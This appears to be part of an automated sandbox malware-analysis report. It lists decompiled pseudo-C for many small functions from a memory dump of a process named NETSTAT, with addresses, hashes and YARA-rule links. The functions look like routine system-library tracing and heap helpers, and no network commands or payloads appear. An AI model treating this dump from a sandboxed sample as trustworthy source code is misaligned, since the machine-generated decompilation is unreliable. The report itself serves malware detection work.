				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x344d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0339FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E03377D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0339B640(E03399AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                0x0341138a
                0x0341138a
                0x03411399
                0x034113a3
                0x034113a8
                0x034113aa
                0x034113b5
                0x034113bb
                0x034113c3
                0x034113c6
                0x034113c9
                0x034113d4
                0x034113e6
                0x034113d6
                0x034113df
                0x034113df
                0x034113f1
                0x034113f2
                0x034113f4
                0x034113f9
                0x0341140e

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 66062aee9adcc695f867fd1f0ecef8cc10b37a14d50b2f87f770a1f5031fa7fd
                • Instruction ID: 531c1dfcafa5ca3fc006426bb615899ff6b3ca70c490b7f55d1af5faa2b664a9
                • Opcode Fuzzy Hash: 66062aee9adcc695f867fd1f0ecef8cc10b37a14d50b2f87f770a1f5031fa7fd
                • Instruction Fuzzy Hash: CC014075E01318AFDB14EFA9D881AAEB7B8EF44710F004066B904EF280E6749A11CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 034114FB Relevance: .0, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 61%
                			E034114FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x344d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0339FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E03377D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0339B640(E03399AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                0x034114fb
                0x034114fb
                0x0341150a
                0x03411514
                0x03411519
                0x0341151b
                0x03411526
                0x0341152c
                0x03411534
                0x03411537
                0x0341153a
                0x03411545
                0x03411557
                0x03411547
                0x03411550
                0x03411550
                0x03411562
                0x03411563
                0x03411565
                0x0341156a
                0x0341157f

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0cf6104daa68bf4a3f5a22c22a2396b41bebdecdbff8acb3d8d7690eb5a511dd
                • Instruction ID: 5fdba111f9f8e7b89773035e82936ceae0e469bf5f3bed345d0483621869db87
                • Opcode Fuzzy Hash: 0cf6104daa68bf4a3f5a22c22a2396b41bebdecdbff8acb3d8d7690eb5a511dd
                • Instruction Fuzzy Hash: FC018075E00248AFDB10EFA8D841EAEB7B8EF44700F004066B915EF380D674DA00CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033558EC Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E033558EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x344d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x3335c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E03355943() != 0 &&  *0x3445320 > 5) {
					E033D7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E033D7B5E( &_v28, _t28);
					_t11 = E033D7B9C(0x3445320, 0x333bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0339B640(_t11, _t17, _v8 ^ _t29, 0x333bf15, _t27, _t28);
			}















                0x033558fb
                0x033558fe
                0x03355906
                0x0335590a
                0x0335593c
                0x0335593c
                0x0335590c
                0x0335590c
                0x03355911
                0x00000000
                0x03355913
                0x03355913
                0x03355913
                0x03355911
                0x0335591d
                0x033b1035
                0x033b103c
                0x033b103f
                0x033b1056
                0x033b1056
                0x0335593b

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f26943de056b5262e1cece75fbdbc4d0de1c79dbe9b95694744257df641c160e
                • Instruction ID: 3609856334e9eddaa1c5980c7e25629a2c05d214d851bc6c9d28f2f7f6607e88
                • Opcode Fuzzy Hash: f26943de056b5262e1cece75fbdbc4d0de1c79dbe9b95694744257df641c160e
                • Instruction Fuzzy Hash: AB018436E002089BDB14EF65EC80DBEB7A8EB46160B594069AC06AB644EF34ED058690
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0340FE3F Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E0340FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x344d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0339FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E03377D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0339B640(E03399AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                0x0340fe3f
                0x0340fe3f
                0x0340fe4e
                0x0340fe58
                0x0340fe5d
                0x0340fe5f
                0x0340fe6a
                0x0340fe72
                0x0340fe75
                0x0340fe78
                0x0340fe83
                0x0340fe95
                0x0340fe85
                0x0340fe8e
                0x0340fe8e
                0x0340fea0
                0x0340fea1
                0x0340fea3
                0x0340fea8
                0x0340febd

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c821fd922434c1281c858826f1194df491d431eed414ea7d9a381e20c90aced9
                • Instruction ID: d8419e8c41cff4965ff268a9581ba7761d67650cfa34c4f0d2081e8dcd03d2ca
                • Opcode Fuzzy Hash: c821fd922434c1281c858826f1194df491d431eed414ea7d9a381e20c90aced9
                • Instruction Fuzzy Hash: 19017175E04308ABDB24EBA9D845FAEB7B8EF44700F044066B900AF281DA749901C798
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0340FEC0 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E0340FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x344d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0339FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E03377D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0339B640(E03399AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                0x0340fec0
                0x0340fec0
                0x0340fecf
                0x0340fed9
                0x0340fede
                0x0340fee0
                0x0340feeb
                0x0340fef3
                0x0340fef6
                0x0340fef9
                0x0340ff04
                0x0340ff16
                0x0340ff06
                0x0340ff0f
                0x0340ff0f
                0x0340ff21
                0x0340ff22
                0x0340ff24
                0x0340ff29
                0x0340ff3e

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d0fbb358b31a3066729f22651a2aa561ac88b86bfd42bf94970ca59c0cb2272
                • Instruction ID: f599ca2629fed02d472f23f959631b495782dcf90d40772a08b1d25f10deff7a
                • Opcode Fuzzy Hash: 2d0fbb358b31a3066729f22651a2aa561ac88b86bfd42bf94970ca59c0cb2272
                • Instruction Fuzzy Hash: C2017175E00208ABDB14EBA9D845BAEB7B8EB85700F004067B900EF280EA749A01C798
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0336B02A Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0336B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E03377D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E033D7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                0x0336b037
                0x0336b039
                0x0336b03b
                0x0336b040
                0x033ba60e
                0x00000000
                0x00000000
                0x033ba61d
                0x0336b04b
                0x0336b04e
                0x033ba627
                0x033ba634
                0x00000000
                0x00000000
                0x033ba641
                0x033ba653
                0x033ba643
                0x033ba64c
                0x033ba64c
                0x033ba65b
                0x00000000
                0x00000000
                0x00000000
                0x033ba66c
                0x0336b057
                0x0336b057
                0x0336b057
                0x0336b046
                0x0336b046
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                • Instruction ID: e5a794de1b7118d2aecc8a43b2d9b91da3eba726ea83778e84aafcc960efffc3
                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                • Instruction Fuzzy Hash: 39017CB2604E84DFD326C71DC9C8FA6BBECEB45650F0940A1EA19CBA95D72CDC40CA20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03421074 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E03421074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0342165E(__ebx, 0x3448ae4, (__edx -  *0x3448b04 >> 0x14) + (__edx -  *0x3448b04 >> 0x14), __edi, __ecx, (__edx -  *0x3448b04 >> 0x14) + (__edx -  *0x3448b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0341AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E03377D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0340FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                0x03421074
                0x03421080
                0x03421082
                0x0342108a
                0x0342108f
                0x03421093
                0x034210ab
                0x034210ab
                0x034210c3
                0x034210cf
                0x034210e1
                0x034210d1
                0x034210da
                0x034210da
                0x034210e9
                0x034210f5
                0x034210f5
                0x034210fe

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d94452bd53e2884bcdab637dba27562c7d1f00dc226a0ac77ae2d2cd6a4a8383
                • Instruction ID: 48633f66fd6b511aded32bb1ba10deb7fc6b34e9ecbbe73440ab08f733f373fd
                • Opcode Fuzzy Hash: d94452bd53e2884bcdab637dba27562c7d1f00dc226a0ac77ae2d2cd6a4a8383
                • Instruction Fuzzy Hash: B3014C765047419FC710EF6AC844B1BBBD5AB84310F04C52AF885AF791EF71D940CB96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03428A62 Relevance: .0, Instructions: 44COMMON
                Download Yara Rule
                C-Code - Quality: 54%
                			E03428A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x344d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E03377D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0339B640(E03399AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                0x03428a62
                0x03428a71
                0x03428a79
                0x03428a82
                0x03428a85
                0x03428a89
                0x03428a8c
                0x03428a8f
                0x03428a92
                0x03428a95
                0x03428a9f
                0x03428ab1
                0x03428aa1
                0x03428aaa
                0x03428aaa
                0x03428abc
                0x03428abd
                0x03428abf
                0x03428ac4
                0x03428ada

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 734780fb7ccd8a95a110e35c08135bbf90f6ed2158675e782a5380404cb86c2e
                • Instruction ID: 4fd2a1ce2b5d76d95a1657f138ef728a4cc7d13a713ec291a726ed4cb51390b1
                • Opcode Fuzzy Hash: 734780fb7ccd8a95a110e35c08135bbf90f6ed2158675e782a5380404cb86c2e
                • Instruction Fuzzy Hash: C8011E75E002189FDB00DFA9D981AAEBBB8EF48710F50405AF904FB341EA34A9018BA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03428ED6 Relevance: .0, Instructions: 44COMMON
                Download Yara Rule
                C-Code - Quality: 54%
                			E03428ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x344d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E03377D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0339B640(E03399AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                0x03428ed6
                0x03428ee5
                0x03428eed
                0x03428ef0
                0x03428efa
                0x03428f03
                0x03428f0c
                0x03428f15
                0x03428f24
                0x03428f27
                0x03428f31
                0x03428f43
                0x03428f33
                0x03428f3c
                0x03428f3c
                0x03428f4e
                0x03428f4f
                0x03428f51
                0x03428f56
                0x03428f69

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fbe392b686057f58f319557b8129b79348d0a21bbfce634d3fc57e77a1527676
                • Instruction ID: 116f091906d85529d8af12f1a5b346fbf970fba1b4187fcbb8573342ea5e4f40
                • Opcode Fuzzy Hash: fbe392b686057f58f319557b8129b79348d0a21bbfce634d3fc57e77a1527676
                • Instruction Fuzzy Hash: 1E110974E002599FDB04DFA8D441BAEFBF4FB08200F0442AAE918EB382E6349940CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0335DB60 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0335DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0335DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0335E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0335E8B0(__ecx, _t14, 0xfff);
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                0x0335db64
                0x0335db66
                0x0335db6b
                0x0335dbaa
                0x0335db71
                0x0335db76
                0x0335db7a
                0x0335dba3
                0x0335db7c
                0x0335db87
                0x0335db8b
                0x033b4fa1
                0x033b4fb3
                0x033b4fb8
                0x0335db91
                0x0335db96
                0x0335db98
                0x0335db98
                0x0335db8b
                0x0335db7a
                0x0335db9d
                0x0335dba2

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                • Instruction ID: b4353bd1387393717d37b36e1db5f023fbcfd6b63ba75145dbf5497d8d507745
                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                • Instruction Fuzzy Hash: 2EF0C8376016229BD332DA5548C0F67BAAB8F81AA1F190035BD059B644C960880286D0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0335B1E1 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0335B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E03377D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E03377D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E033D7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                0x0335b1e8
                0x0335b1ea
                0x0335b1f3
                0x033b4a17
                0x0335b1f9
                0x0335b1f9
                0x0335b1f9
                0x0335b201
                0x033b4a21
                0x033b4a2e
                0x00000000
                0x00000000
                0x033b4a3b
                0x033b4a4d
                0x033b4a3d
                0x033b4a46
                0x033b4a46
                0x033b4a55
                0x00000000
                0x00000000
                0x00000000
                0x0335b20a
                0x0335b20a
                0x0335b20a
                0x0335b20a

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                • Instruction ID: 886f7b87f38126503abf43e480f0e84e012c08fcff74ec2276bd2fed6fbb34e4
                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                • Instruction Fuzzy Hash: E5018636600684DBD322D75ADC89FA9BBADEF41754F0D40A1FE148BAB2D679C800C369
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033EFE87 Relevance: .0, Instructions: 38COMMON
                Download Yara Rule
                C-Code - Quality: 46%
                			E033EFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x344d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E03377D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0339B640(E03399AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                0x033efe96
                0x033efe9e
                0x033efea1
                0x033efead
                0x033efeb3
                0x033efeb9
                0x033efec3
                0x033efed5
                0x033efec5
                0x033efece
                0x033efece
                0x033efee0
                0x033efee1
                0x033efee3
                0x033efee8
                0x033efefb

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d8dffbb1a05c2f19221a237676716bf17e7ff45b23352ab9b32f505f3b42700
                • Instruction ID: 171405da2909cd019889af50aa119c2f85243c4ed61dc70a8d3a6a3c5594ee84
                • Opcode Fuzzy Hash: 1d8dffbb1a05c2f19221a237676716bf17e7ff45b23352ab9b32f505f3b42700
                • Instruction Fuzzy Hash: 9B011274E00318EFCB14DFA8D585A6EB7F4EF04704F144169A515EF392E675E901CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03428F6A Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                C-Code - Quality: 48%
                			E03428F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x344d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E03377D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
